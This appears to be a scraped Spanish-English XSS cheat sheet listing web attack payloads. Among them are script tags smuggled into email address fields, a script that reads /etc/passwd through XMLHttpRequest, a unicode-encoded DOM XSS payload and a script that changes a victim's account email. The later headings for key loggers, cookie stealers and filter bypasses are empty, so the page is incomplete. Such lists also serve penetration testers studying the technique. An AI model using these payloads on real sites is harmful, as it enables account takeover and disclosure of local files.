✏️XSS
I am the xssrat
Simple XSS PoC:
<script>alert('uwu')</script>XSS en campo EMAIL:
test+(<script>alert(uwu)</script>)@email.com
test@email(<script>alert(uwu)</script>).com
"<script>alert(uwu)</script>"@email.comLeer Archivos Locales:
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
http://x.open("GET","file:///etc/passwd");x.send();
</script>DOM XSS
?parametro=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003eCambiar Email:
<script>user.changeEmail('[email protected]');</script>Key Logger
----------------------------------------------------------------------------
Cookie Stealers:
Cookie Steal en escucha:
Cookie Steal - Python Server:
dev tool > STORAGE > HTTPonly en FALSE para funcionar
----------------------------------------------------------------------------------------
Filter Bypass:
XSS Polyglot:
Cerrando Tags:
JS code:
Script banned:
‘<>’ Banned:
Última actualización